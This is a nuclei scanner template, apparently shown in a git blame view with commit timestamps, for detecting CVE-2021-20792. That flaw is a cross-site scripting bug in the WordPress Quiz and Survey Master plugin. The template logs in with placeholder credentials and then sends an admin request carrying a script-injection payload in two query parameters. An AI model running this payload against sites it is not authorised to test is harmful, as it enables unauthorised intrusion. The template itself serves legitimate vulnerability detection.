nuclei-templates/cves/2021/CVE-2021-20792.yaml

53 lines
1.6 KiB
YAML
Raw Normal View History

2022-02-04 19:16:00 +00:00
id: CVE-2021-20792
info:
name: WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting
2022-02-04 19:16:00 +00:00
author: dhiyaneshDK
severity: medium
description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.
2022-02-04 19:16:00 +00:00
reference:
- https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
- https://quizandsurveymaster.com/
- https://jvn.jp/en/jp/JVN65388002/index.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-20792
2022-02-04 19:16:00 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-02-04 19:16:00 +00:00
cve-id: CVE-2021-20792
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan
2022-02-04 19:16:00 +00:00
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
2022-02-08 18:26:17 +00:00
2022-02-04 19:16:00 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 18:26:17 +00:00
GET /wp-admin/admin.php?page=mlw_quiz_list&s="></script><script>alert(document.domain)</script>&paged="></script><script>alert(document.domain)</script> HTTP/1.1
2022-02-04 19:16:00 +00:00
Host: {{Hostname}}
2022-02-08 18:26:17 +00:00
cookie-reuse: true
2022-02-04 19:16:00 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-02-08 18:26:17 +00:00
words:
- '</script><script>alert(document.domain)</script>'
2022-02-04 19:16:00 +00:00
- type: status
status:
- 200
- type: word
2022-02-08 18:26:17 +00:00
part: header
2022-02-04 19:16:00 +00:00
words:
- "text/html"
# Enhanced by mp on 2022/09/02